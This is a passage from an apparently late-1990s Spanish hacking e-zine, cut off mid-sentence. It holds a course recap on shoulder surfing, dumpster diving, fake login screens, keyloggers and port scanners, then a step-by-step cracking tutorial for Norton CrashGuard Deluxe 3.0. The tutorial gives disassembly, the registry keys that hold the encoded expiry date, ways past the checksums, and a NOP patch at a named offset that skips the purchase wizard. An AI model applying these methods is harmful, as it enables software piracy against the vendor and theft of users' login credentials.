ordendaor como herramienta, me estoy refiriendo logicamente a: Shoulder
Surfing, Trashing, Pantallas Falsas y Key Recorder. Ahora explicaremos cada
una de las diferentes tecnicas. Shoulder Surfing es sencillamente mirrar por
encima del hombro cuando una persona esta metiendo su login y pa°word para
entrar en su cuenta. Trashing cuando 'cotilleamos' la basura de un ISP,
Telefonica, etc... con el fin de obtener alguna informacion util para
hackear. Las Pantallas Falsas son cuando escribimos un pequeño programa que
simula la conexion a un servidor y cuando la victima introduce su login y
pa°word, estos quedan grabados para nuestro posterior uso. Los Key
Recorder son parecidos a las Pantallas Falsas, ya que eston son unos
pequeños programas que se dejan residentes en memoria para que vaya grabando
las teclas que los usuarios pulsen. Logicamente aqui solo he definido de
manera sencilla el uso de las diferentes tecnicas, para profundizar en la
materia conviene leerse otra vez el numero II del ezine.

El capitulo III se dedico a una interesante y util herramienta de un
hacker, me estoy refiriendo al scaneo de puertos, ya que esto nos sera de
gran ayuda para buscar bug's en los servidores y poder colarnos o taparlos
:). Es conveniente tener a mano un listado de los puertos, como el que se
incluyo en el ezine III y tb disponer de varios tipos de scaners como por
ejemplo para scanear puertos, sub-dominios, etc... Al igual que antes para
coger mas soltura leerse el capitulo III.

- Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles.

#ident-scan.c

#ftp-scan.c

#jakal.c

#strobe103_tar.gz

#scan.sh

#statd-scan.c

#udpscan.c


El capitulo IV junto con el III consiste en analisis de servidores,
en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux
para obtener informacion de un servidor remoto. Siendo muy util tanto para
un hacker como para un Administrador. Tengo que confesar que no explique
todos los comandos que nos pueden ser utiles para un analisis pero si lo
explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se
hace a si mismo a base de estudio y paciencia'. Tambien deciros que para
aplicar estos metodos de analisis conviene saber Unix/Linux ya que sino,
si solo plagiamos los comandos explicados, no sabemos que hacen exactamente
y no queremos aprender nada mas, entonces no llegaremos muy lejos y ni
siquiera seremos un intento de hacker.

Ahora ya creo que las dudas que hubiese podido haver han desaparecido,
pero lo conveniente seria volverse a leer los capitulos que no hayan quedado
claros y por supuesto experimentar con lo aprendido. Desde estas lineas
quiero hacer un llamamiento a aquellos lectores que sigan el curso y
consigan resultados positivos para que nos envien un mail poniendo en el
subject :'Curso Hack JJF' y asi lo pondre aqui para que todos lo vean,
incluso si has creado algo nuevo, pues mucho mejor :) Para los paranoicos
tenemos a disposicion la llave publica PGP de - J.J.F. / HACKERS TEAM -.

Pues viene el tipico rollo pero que nos puede ser muy util, es el
bocabulario tecnico que hemos estado usando en el curso.

- Un Poco De Bocabulario Tecnico.

#C: Lenguaje de programacion general.

#Hacker: Persona que disfruta explorardo nuevos usos en la tecnologia por
puro placer, jamas con fines delictivos.

#Hacking: Accion realizada por un hacker.

#Ingenieria Social: Tecnica por el cual un hacker engaña a una persona para
sacarle informacion privilegiada.

#Key Recorder: Programa el cual graba las teclas que van siendo pulsadas.

#Linux: Sistema Operativo semejante al Unix el cual es gratis.

#Pantallas Falsas: Tecnica o Programa el cual simula la conexion a un
servidor para interceptar login y pa°word.

#PGP: Pretty Good Privacy. Programa de criptografia el cual no puede ser
desencriptado actualmente.

#Puerto: Medio por el cual un servicio de un servidor se comunica con el
cliente.

#Shoulder Surfing: Tecnica que consiste en mirrar por el encima del hombro.

#S.O.: Sistema Operativo.

#Trashing: Tecnica en la cual se cotillea la basura fisicamente para obtener
informacion util.

#Unix: Sistema Operativo, que cual es multitarea y multiusuario.

Bueno chicos, esto es todo por hoy y ya en el proximo capitulo
haremos algo mas interesante, pero como debeis comprender estos capitulos de
repaso son necesarios.

Byes all y hasta la vista !!

CONDE VAMPIRO
- J.J.F. / HACKERS TEAM -

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

-->>-> CORTA HISTORIA DEL TIEMPO <-<<--

Norton CrashGuard Deluxe 3.0

TIPOS DE PROTECCIONES TEMPORALES
UN POCO DE TEORIA
EN BUSCA DE LA FRASE MAGICA
EL REGISTRO DEL SISTEMA

COMO CRACKEAR Norton CrashGuard Deluxe 3.0

PRIMERA EXPLORACION
PRIMERA SORPRESA
SEGUNDA SORPRESA

LA APROXIMACION DIFICIL

AL ATAQUEEEEEEEEEEEEEE
LA FECHA DE CADUCIDAD
CHECKSUMS PARAINOCOS
CHECKSUMS HASTA EN LA SOPA
LA MISMA PROTECCION EN TODOS SITIOS

LA APROXIMACION FACIL

REUNIENDO LAS PIEZAS
LA COMPRA VIRTUAL
MODIFICANDO EL REGISTRO
MODIFICACI”N DE LA VARIABLE DEL REGISTRO DEL SISTEMA

MORALEJA

Saludos Familia.

Bastante tiempo desde mi ultimo articulo, los se, pero ya estamos de
vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un
poco de teoria y lo aprendido lo aplicaremos al programa Noton Uncrash
Deluxe desde dos puntos de vista, el temporal y el de la pa°word pa
registrarse.

TIPOS DE PROTECCIONES TEMPORALES

Demos un peque repaso a los diferentes esquemas de proteccion
temporal que nos podemos encontrar (recomiendo la lectura del Capitulo
4.1 de +ORC )

- CINDERELLA. El programa funciona durante una cierto periodo de dias
(digamos 15 dias) comenzando desde la fecha de instalacion.

- BEST_BEFORE. El programa funciona durante una cierto periodo de
tiempo independientemente de la fecha de instalacion. El programa caduca
el 30/12/97.

- COUNTDOWN. El programa funciona solo durante unos minutos o unos
segundos.

- QUIVER. El programa funciona solo durante un numero determinado de
ejecuciones. Realmente no es una proteccion temporal, pero su esquema de
proteccion se parece mucho al de los otros tres tipos.

UN POCO DE TEORIA

Analizemos como funciona una proteccion temporal.

Los "inteligentes programadores" ofertan sus productos completos al
publico con ridiculas protecciones. Le colocan una fecha de caducidad,
pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo
las grandes compañias como Micro$oft, Corel, o Symantec. La idea es
distribuir masivamenete sus productos aprovechando los estupendos canales
de distribucion que ofrecen las revistas de Soft. Una vez inundado el
mercado, el usuario disfrutara del producto, se acostumbrara a el, hasta
que le sea indispensable y tenga que comprarlo a un precio desorbitado.
Esta tactica no es nueva, sino preguntad a algun camello, o como la CIA
distribuyo la heroina entre el Black Power.

Pensemos un poco. ®Como conoce el programa que ya ha caducado el
periodo de evaluacion?. Supongamos que tenemos una evaluacion e 15 dias e
instalamos nuestro programa el 1 de febrero. Sumando la fecha de
instalacion (1 Febrero) mas el periodo de prueba se obtiene la fecha de
caducidad:15 febrero (El dia en el que lo instalas cuenta como dia habil).
El programa, lo primero que calcula es si la fecha actual es menor o igual
que la fecha de caducidad, y en tal caso, se ejecuta normalmente. Si es
mayor, dara un bonito mensaje "El periodo de evaluacion ha expirado".

Una cosa esta clara, el programa debe guardar alguna de las dos
fechas siguientes (o las dos):

A - Fecha de Instalacion y el periodo de evaluacion.
B - Fecha de caducidad.

Lo normal es la opcion B. Al instalarse el programa, se calcula la
fecha de caducidad y se guarda en algun sitio. Normalmente se guarda en el
registro del sistema bajo algun nombre estupido, aunque se puede guardar en
el win.ini, system.ini, fichero oculto, o algun fichero que parezca
inofensivo. Lo cierto es que debe guardarlo.

Existe una variante, y es que la fecha de caducidad este dentro del
ejecutable. Un ejemplo lo tenemos en la evaluacion del Hotmetal 4.0., del
tipo BEST_BEFORE, que dentro de su ejecutable aparecia 31/12/97. Madre de
Mitra, que estupidos pueden llegar a ser los zombi-programadores.
Dependiendo de la pericia del programador la fecha de caducidad puede estar
o no encriptada para ocultarla de la vista del usuario y para que sea
dificil modificarla. Resumiendo, el programa debe guardar la fecha de
caducidad y comprobarla al inicio del programa con la fecha actual.

Ya sabemos de donde saca la fecha de cadudidad, pero, ®de donde saca
la fecha actual?. Normalmente (el 99% de las veces) se extrae con una
llamada a la funcion getlocaltimeo o getsystemtime. Pero se puede extraer
viendo la fecha de algun fichero que se modifique periodicamente como el
system.dat o el bootlog.txt.

Los puntos de ataque a este esquema son claros:

- Atacar en el calculo de la fecha de caducidad.
En vez de sumar 15 dias sumamos 15 siglos. Esta aproximacion es dificil por
que el calculo se realiza una unica vez, generalmente en la instalacion.

- Modificar la fecha de caducidad.
Si la fecha esta encriptada, necesitariamos construir un algoritmo de
encriptacion para la nueva fecha que deseemos introducir. Por lo que en
general, puede ser complicado.

- Forzar la caducidad del programa.
Se analizan los mensajes que da el programa y a partir de ellos se le sigue
la pista hacia atras. Es una tactica muy utilizada.

- Atacar en la comprobacion de la fecha actual y la fecha de
caducidad.
Simplemente modifica la comprobacion para que siempre estemos en el periodo
de evaluacion. Esta es una opcion elegante.

Alguien podria pensar que si se echa pa tras el reloj de W95, la
proteccion temporal se elimina. Para evitar esta "trampilla", los
programadores colocan codigo como el siguiente:

SI esta activada la marca de caducidad ENTONCES el programa ha
caducado y se finaliza el programa DE LO CONTRARIO SI
fechaActual>fechaCAducidad ENTONCES activar marca de caducidad

Como veis si os pasais de la fecha de caducidad, se activa una marca
que impedira que se ejecute el programa aunque modifiqueis el reloj. Esta
marca se guarda en los mismos sitios donde se guarda la fecha de caducidad.

A veces, la proteccion temporal queda eliminada introduciendo una
palabra clave, por lo que a veces es mas rapido atacar por la pa°word.

Para averiguar el fichero que contiene la proteccion temporal, se
puede usar el SoftIce y poner un bpx getlocaltime, o bien una nueva tecnica,
muy util no solo para protecciones temporales. Veamosla.

EN BUSCA DE LA FRASE MAGICA

Todos los mensajes de un programa, los de error, los de felicitacion,
los de aviso, no son mas que cadenas de caracteres que deben de residir en
un fichero. Para protecciones temporales es util buscar mensajes como
'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos
localizado, generalmente, el fichero que contiene la proteccion y podemos
desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con
buscar los mensajes 'unregistered', 'register' para localizar el programa
con la proteccion en esquemas por palabra clave. Recomiendo una herramienta
excelente para buscar cadenas, es el programa sr32.exe, Search & Replace
for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajaoslo y
crackearlo, tiene una bonita y sencillota proteccion del tipo CINDERELLA.

EL REGISTRO DEL SISTEMA

El Registro del Sistema no es mas que un fichero gigante (system.dat)
donde W95 y el esto de los programas dejan sus miserias, osea, sus
variables, sus parametros de configuracion, su fecha de caducidad, sus
marcas de caducidad. Muchos cracks solo necesitan modificar adecuadamente
el system.dat Es muy conveniente que le echeis un vistazo, aprendereis
mucho y podreis modificar muchos de los parametros del Windoze.

Para editar el registro, se utiliza normalmente el programa
regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo
que lo ejecuteis con el parametro /v ,osease, c:\windows\regedit /v

COMO CRACKEAR Norton CrashGuard Deluxe 3.0

Objetivo: Norton Uncrash Deluxe.
Version: 3.0
Nombre del ejecutable: ncgd3w95.exe
Website: http://www.symantec.com
Tamaño del ejecutable: 11.964.671 bytes.
Tipo de proteccion: Cindirella
Dificultad: Medio.
Tiempo de crackeo: 2 horas.
Herramientas: W32dasm8.X, SoftIce.

En esta ocasion, nuestro objetivo es una gran y abominable compañia,
la Symantec y uno de sus muchos y abominables producto: Norton CrashGuard
Deluxe 3.0 Basicamente, el programa consigue, en algunas ocasiones, que las
aplicaciones que se cuelgan no bloqueen al Windoze. Cosa de agradecer dado
el alto indice de siniestralidad de las aplicaciones y del propio Windoze.
Ademas de tener una B.D de informacion sobre el PC, una antivirus ... Se
protege con proteccion temporal CINDERELLA de 30 dias.

PRIMERA EXPLORACION

Instalamos el programa y antes de finalizar la instalacion ya nos
pide que nos registremos, mal asunto, quieren cobrar antes de que probemos
su producto, su codicia de palpa ante incluso de ver el programa.

Una vez instalado, nos ha metido a escondidas varias cosas:

- Una Dll con un extraño nombre: 30vfv6vn.sys situada en el raiz de
la unidad c: El nombre varia en cada instalacion, solo permanece fijo
*fv6vn.sys, los 3 primeros caracteres son variables. Sospecho que solo es un
indicador para ver si el programa ya ha sido instalado.

- Una aplicacion en el arranque del Windoze Norton CrashGuard Deluxe
Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicacion por dos veces
con el nombre de checkup Su mision es detectar cualquier cambio en el reloj
del sistema para bloquear inmediatamente la aplicacion si nos pasamos de la
fecha de caducidad.

Ademas se crean dos directorios Norton CrashGuard y Norton CrashGuard
Deluxe y nos aparece un bonito icono en el escritorio del Windoze con forma
de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si
fuera poco, dos iconos en la barra de tareas, la aplicacion propiamemte
dicha (escudo gris con una N en azul) y una historia de los cuelges de los
programas (un reondel con una marca de verificacion).

Si pulsamos en el icono del escritorio nos aparece una ventana donde
nos dice que nos compremos INMEDIATAMENTE la aplicacion a un precio
fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el
numero de dias que restan para el programa deje de funcionar. Ademas
aparecen unos bonitos botones en los que nos podemos registrar por Internet,
probar el producto o cancelar. Si probamos el producto, aparece la ventana
principal con todas pas opciones. Si elegimos la opcion de registro,
aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta de
credito.

  PRIMERA SORPRESA 

El sistema de pago no es de la propia Symantec, sino de la empresa
Release Software Corporation:http://www.releasesoft.com) y su programa
SalesAgen. Es la primera vez y veo que Symantec no controle todos los
aspectos de una aplicacion.

SEGUNDA SORPRESA

El fichero a estudiar es el Norton CrashGuard\cgmain.exe (229.376
bytes) por una simple razon, tiene el unico fichero que tiene el icono que
el del programa principal que aparece en la barra de tareas. Pero, en el
mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936
bytes). Mu raro, una libreria aparentemente comprimida (y por tanto no
utilizada) con un tamaño mas grande que el ejecutable. Por que no esta
descomprimida la libreria, ®quizas por que no estamos registrados? :-)

Ademas aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu
parecido al fichero del programa que estamos analizando cgmain.exe y tiene
un icono que tiene las letras RS, que curioso, justo las Iniciales del la
empresa que dedica a comercializar el producto: Release Software. Si
intentamos ejecutar cgmaipop.exe aparece que esta preparando el Software.
PREPARANDO?, ®es que hay que precalentar los programas antes de
instalarlos?. Luego aparece un mensaje de error indicando que no podemos
ejecutar la aplicacion, ®quizas por que no estamos registrados? :-)

Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un
nombre muy parecido al de la aplicacion que queremos estudiar y
aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio,
donde reside el menu de la aplicacion Norton CrashGuard Deluxe\CGDeluxe.exe
aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll.
Analogamente para Norton CrashGuard Deluxe\checkup.exe (el programa de
testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll

Todo esto huele a chamusquina, seguro que estos ficheros tienen algo
que ver a la hora de registrar el programa, y como veremos en la segunda
pate del articulo, tienen que ver y MUCHO.

LA APROXIMACION DIFICIL

AL ATAQUEEEEEEEEEEEEEE

Podriamos analizar esos extraños ficheros que han aparecido, y lo
haremos en la segunda parte del articulo. Ahora atacaremos formalmente a
Norton CrashGuard\cgmain.exe para analizar su esquema CINDERELLA de 30 dias.

Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de
fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5)
Name: GetLocalTime. Bien, bien, asi que, aparentemente, esta usando la
tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza,
estaremos en plena rutina de comprobacion de fecha: fechaActual>fecha de
caducidad?

Solamente aparece la funcion getlocaltime que es utilizada una vez en
el programa(®por que lo ponen tan facil?)

* Referenced by a CALL at Addre°es:
|:0040D5B4 , :0040DA44 , :0040DD3F; La rutina es llamada 3 veces

:0041E200 81ECCC000000 sub esp, 000000CC
:0041E206 8D442410 lea eax, dword ptr [esp+10]
:0041E20A 50 push eax

* Reference To: KERNEL32.GetLocalTime, Ord:00F5h
|
:0041E20B FF15BC544400 Call dword ptr [004454BC]
:0041E211 8D4C2400 lea ecx, dword ptr [esp]
:0041E215 51 push ecx

* Reference To: KERNEL32.GetSystemTime, Ord:0135h
|
:0041E216 FF15B8544400 Call dword ptr [004454B8]
.....

Ademas aparece la llamada tambien a GetSystemTime.

Tras la llamada a GetSystemTime los valores de año, mes, dia,.... son
extraidos de la pila y guardados en los registros :0041E21 mov dx, word ptr
[esp+0A] De los registros pasan a unas variables globales :0041E2AA mov
dword ptr [0042F7F0], edx

Recordad, cualquier posicion de memoria fija como [0042F7F0], es
utilizada como variable global por el programa. Despues se reintroducen en
la pila el año, el mes, el dia,.... y se llama a la rutina :0041E310 call
00423420.

En esta rutina es donde se realiza la encriptacion de la fecha,al
finalizar, devuelve en eax la fecha encriptada y ademas de guardarse en
:0041E323 mov dword ptr [ecx], eax

Es mas, las tres llamadas a :0041E200 obtendran en eax la fecha
encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo
como es la rutina de encriptacion. Simplemente decir que utiliza la
siguiente formula :

t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+
(secondsDay*daysMonth[month])+(secondsYear*(year-1900))+(secondsDay*((
(year-1900)-1)/4));
fin=(t+fixValue);

Siempre es mas facil comparar un numero que comparar años, dias,
meses,... por eso la fecha se transforma en un numero. He construido un
pequeño programa NORTON.EXE en C que realiza todo el proceso de
encriptacion de la fecha.

Bien, lo logico, es que una vez encriptada la fecha se compruebe con
la fecha de caducidad que debe estar encriptada. Si analizamos las tres
llamadas a :0041E200 tenemos:

* La llamada desde :0040D5B4, se limita a guardar la fecha encriptada
:0040D641 mov dword ptr [esi+000002AC], eax

* La llamada desde :0040DA44, :0040DD3F hacen practicamente lo mismo,
mueven la fecha encriptada que estaba en eax a un registro, hacen una
llamada a call 40DC40 y despues comprueban la fecha encriptada con
[edi+00000284]

En concreto para la llamada desde :0040DD3F
:0040DD4B mov ebx, eax

:0040DD62 push ebx
:0040DD63 call 0040DC40

:0040DD7B cmp dword ptr [edi+00000284], ebx
:0040DDBF ja 0040DDE4

En concreto para la llamada desde :0040DA44

:0040DA54 mov edi, eax

:0040DA5F push edi
:0040DA60 call 0040DC40

:0040DAB2 cmp dword ptr [ebx+00000284], edi
:0040DAB8 ja 0040DACE

Esto suena a una doble comprobacion temporal, seran desconfiados
estos chicos.

®Pero que hace la llamada a call 0040DC40?, para ello cerramos el
cgmain.exe: boton derecho sobre el icono de la N y el escudo y exit.
Abrimos el loader del Softice y seleccionamos Norton CrashGuard\cgmain.exe
y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice,
pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el
cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el
programa y prestamos atencion a ebx que es el que contiene la fecha
encriptada.

La llamada a call 0040DC40 simplemente realiza la siguiente
comprobacion

:0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual
:0040DC58 ja 0040DC64; Salta si eres un mal chico.

fechaAnterior es la fecha encriptada el la que se arranca por ultima
vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200.
Es una simple comprobacion para ver si hemos echado para atras el reloj.

La comprobacion

cmp dword ptr [ebx+00000284], edi; Analogamente cmp dword ptr
[edi+00000284], ebx
ja 0040DACE; Analogamente ja 0040DDE4

Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el
periodo de prueba.

LA FECHA DE CADUCIDAD

La pregunta es, ®de donde se guarda la fecha de caducidad encriptada?.
Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha de
encriptacion se guarda en el registro del sistema y es recuperada por la
llamada a la funcion :40BD89 RegqueryValueEXA. En concreto, se guarda en
HKEY_CLA°ES_ROOT\Ultxfile\Format\MSHAEZDOC\write

En mi caso, el valor de write es:

01 02 03 04 05 06 07 08

01 00 00 00 05 B7 FF FF F8
02 00 00 00 00 00 00 10 00
03 08 00 00 00 08 00 00 00
04 00 00 00 06 B3 36 71 A1
05 FB 0F 81 A5 20 80 00 06
06 B7 9F A9 A0 00 00 00 00
07 00 00 00 06 B3 36 71 A0
08 C3 28 00 00 18 00 00 00
09 00 00 00 00 00

La fecha de caducidad esta en write(5,7) hasta write(6,5) ambos
inclusive. Lo curioso, es que la fecha esta codificada, por ejemplo si la
fecha de caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La
rutina de encriptacion esta en :40C0D6 y se basa en la operacion or

:0040C0D6 8A18 mov bl, byte ptr [eax]
:0040C0D8 8A11 mov dl, byte ptr [ecx]
:0040C0DA C0E305 shl bl, 05
:0040C0DD 48 dec eax
:0040C0DE C0EA03 shr dl, 03
:0040C0E1 49 dec ecx
:0040C0E2 0ADA or bl, dl
:0040C0E4 4E dec esi
:0040C0E5 885101 mov byte ptr [ecx+01], dl
:0040C0E8 885901 mov byte ptr [ecx+01], bl

He creado dos programas DECODE que decodifica el valor de write y
CODE que codifica un valor de fecha para introducirlo en write.

CHECKSUMS PARAINOCOS

Los puntos de ataque son claros

1.- Parchear las comprobaciones en el ejecutable.
2.- Introducir una fecha caducidad en el año 30000.

1.- Si parcheamos el programa, se produce un error tan gordo que se
casca windows. Esto se puede deber a que hemos crackeado mal obien exite un
checksum. Para salir de dudas, basta con modificar alguna cadena de
caracteres del ejecutable original Por ejemplo "not be run in DOS mode" lo
pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum,
como en este caso.

Un checksum es una comprobacion para ver si el ejecutable se ha
modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y
guardando este valor algun sitio (ejecutable, registro del sistema). El
programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba
la suma con el valor que tenia guardado. Si hay algun problema es que un
virus o un cracker ha modificado el programa y esto nunca es bueno para el
programador.

En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza
de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos
parecia tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe
encriptados (de ahi que tuvieran un tamaño tan parecido ambos ficheros). La
rutina de checksum, simplemente consiste en coger de 16 en 16 los bytes del
cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero
cgmaitky.dll. Si existe alguna diferencia se produce un error de proteccion
general y se casca todo.

Para complicarlo todo, las rutinas de comprobacion (ver si los 16
bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no estan
metidas en un bucle, sino que estan a lo extenso. Es decir, hay una rutina
de comprobacion para los 16 primeros bytes, otra disinta para los 16
siguientes. Si queremos parchear el checksum, habra que modificar unas 30
comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al
checksum :0040862D jne 00408695 si obligamos a saltar siempre, evitamos el
checksum. PERO, ®POR QUE EXISTE UN FLAG PARA EVITAR EL CHECKSUM?, ®es que
el programa cgmain.exe va a modificarse? Como veremos mas tarde, asi
ocurrira.

2.- Con el programa NORTON se crea la fecha de caducidad que queremos,
con el programa CODE se encripta y ya solo hay que introducir el resultado
en HKEY_CLA°ES_ROOT\Ultxfile\Format\MSHAEZDOC\write en las posiciones
write(5,7),write(6,5)

CHECKSUMS HASTA EN LA SOPA

Cuando la fecha de caducidad ha vencido, el programa deja de
funcionar parcialmente, si analizamos el porque descubrimos que el byte
[esi+00000568] controla todo el meollo. En concreto,

Si [esi+00000568] = 02 You cannot Run this Application
Si [esi+00000568] = 20 Your computer application source has changed
Si [esi+00000568] = 08 Your free trial period is over
Si [esi+00000568] = 04 OK

Pero, ®como se rellena este byte?. Siguiendo la pista hacia atras
descubrimos que se carga a partir de
HKEY_CLA°ES_ROOT\Ultxfile\Format\MSHAEZDOC\open

00 01 02 03 04 05 06 07

1 00 00 00 00 30 00 00 00
2 00 00 00 00 00 00 10 00
3 08 08 00 00 20 00 00 00
4 00 00 00 00 00 00 00 00

En concreto de write(3,4). Hay que tener cuidado por que esta
encriptado, asi que hay que utilizar el programa DECODE. Osea , si en
write(3,4)=20 indica que al desencriptarlo [esi+00000568]=4. Si
write(3,4)=40 la fecha de caducidad ha vencido.

Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el
programa replica diciendo que hemos trampeado los recursos. ®QUE PASA AQUI?.

Mu facil, HAY UN CHECKSUM en la seccion
HKEY_CLA°ES_ROOT\Ultxfile\Format\MSHAEZDOC\open. Estos es paranoico, un
checksum en el propio registro del sistema. En concreto, el checksum esta
en write(1,4). Se deja como ejercicio localizar y destruir este checksum.

LA MISMA PROTECCION EN TODOS SITIOS

Aunque parezca increible, los ficheros CGDeluxe.exe y CheckUp.exe
tienen exactamente la misma proteccion que cgmain.exe y ademas en los
mismos offset, osea en las mismas direcciones de memoria. Esto es
extremadamente extraño, asi que adoptaremos otra via de ataque.

LA APROXIMACION FACIL

Veamos lo que tenemos:

- Unos ficheros extraños asociados a los ficheros importantes.
Sabemos la funcion de uno de ellos los *tky.dll sirven de checksum, pero y
el resto para que sirven?

- Un flag que desactiva el checksum del ejecutable.

- Unos misteriosos fichero ejecutables con el logo RS que dicen que
tiene que prepara el Sotware.

Nos centraremos en los ejecutables con los logos RS.

REUNIENDO LAS PIEZAS

Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero,
CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una
libreria de un gran tamaño , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que
"prepara el Software".

No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara"
de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a
CGDeluxe.EXE. Esta "preparacion" solo se realiza cuando estamos registrados.

Por tanto, se parte de un archivo ejecutable de un tamaño inferior a
la version completa del programa. Una vez realizado el proceso de compra se
activa otro ejecutable que convierte la version de prueba en version
completa .

Todas las demas utilidades que acompañan al Norton CrashGuard Deluxe
tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_,
Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll)

LA COMPRA VIRTUAL

Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en
nuestra "Primera Aproximacion" : Doble click en el escudo con la N que hay
en el escritorio y al pulsar el boton Buy Now (comprar ahora) aparece el
asistente de compra.

Este sera nuestro punto de entrada. Si pensamos un poco observaremos
que la aplicacion que lanza el proceso de compra debe saber si la compra ha
tenido exito o no. Por tanto, sera por aqui por donde centremos nuestros
esfuerzos. Ademas debe de anunciar de alguna forma al resto de utilidades
que la compra ha tenido exito para que ellas tambien se "preparen"
Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el
icono del escritorio) y observaremos como "compra".

Nada mejor que usar un desensamblador para investigar el programa
CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso
de la libreria comercial RSAGNT32.DLL (encargada de realizar la compra
virtual) y que existen un referencias a funciones tales como SAInitialize,
startSalesAgent. Estas van a ser nuestras funciones de aproximacion.

Pulsamos en el boton de Imported Functions (Imp Fn) y hacemos doble
click en la linea de rsagnt32.startSalesAgent.

Aparecera en el listado lo siguiente:

* Reference To: rsagnt32.startSalesAgent, Ord:000Eh

:00407834 E807F30000 Call 00416B40 fl Llamada al asistente
:00407839 83C408 add esp, 00000008
:0040783C 66833D0425430000 cmp word ptr [00432504], 0000
:00407844 742B je 00407871

Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que
nos encontramos en un bloque de codigo que se encarga de cargar, iniciar,
ejecutar, terminar el asistente de compra. Buscamos donde puede empezar el
bloque. Y un poco mas arriba encontramos:

///////////// INICIO DE BLOQUE ////////////////
* Referenced by a CALL at Addre°:
:00406752 <- desde aqui es llamado el bloque del
asistente de compra

:004077B0 A1B07B4300 mov eax, dword ptr [00437BB0]
:004077B5 53 push ebx
: :
: :
* Reference To: rsagnt32.startSalesAgent, Ord:000Eh <- Aqui hemos
comenzado
la busqueda

:00407834 E807F30000 Call 00416B40 <- Llamada al
asistente
:00407839 83C408 add esp, 00000008
:0040783C 66833D0425430000 cmp word ptr [00432504], 0000
:00407844 742B je 00407871
:00407846 BFE0A54300 mov edi, 0043A5E0
: :
: :
:00407878 5F pop edi
:00407879 5E pop esi
:0040787A 5B pop ebx
:0040787B C3 ret

///////////// FIN DE BLOQUE ////////////////

Ahora una vez que conocemos desde donde hemos llamado al bloque,
usamos el menu Goto -> Goto Code Location y escribimos el desplazamiento
406752. Aqui observamos lo siguiente:

* Po°ible Reference to String Resource ID=00001: "Turnkexe"

:00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001
:00406752 E859100000 call 004077B0 <- Entrada en el
bloque anterior
:00406757 66392D04254300 cmp word ptr [00432504], bp
:0040675E 0F84F4010000 je 00406958
:00406764 BF34254300 mov edi, 00432534

Ummmma. Aqui ya tenemos una bonita direccion de memoria (variable
global) para usar con Softice.Pero antes añadamos la libreria RSAGNT32.DLL.
al la lista de dll que sabe manejar el Softice.

Abrimos el Symbol Loader de Softice y en el menu Edit -> Softice
Initialization Settings -> Exports añadimos RSAGNT32.DLL. Abrimos el Symbol
Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce:

Bpx 406752
Bpx startSalesAgent

Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec
Trialware"
pulsamos sobre el boton "Buy Now". Aparecer en el Softice en el
primer breakpoint Bpx 406752

Seguimos ejecutando, paramos en la funcion startSalesAgent

cs:00407834 E807F30000 Call rsagnt32!startSalesAgent <- Asistente
de compra
cs:00407839 83C408 add esp, 00000008
cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000
cs:00407844 742B je 00407871 <- si salta, has
comprado

Nopeamos el asistente de compra. Esto es, sustituimos la llamada por
instrucciones inonfesivas. En : 00407834 90 90 90 90 90

Si estudiamos je 00407871 y hacemos que no vaya a la direccion 407871
aparece una ventana contandonos que se ha grabado un archivo llamado
Rslicens. txt pero esto no hace que se active el proceso de compra, este
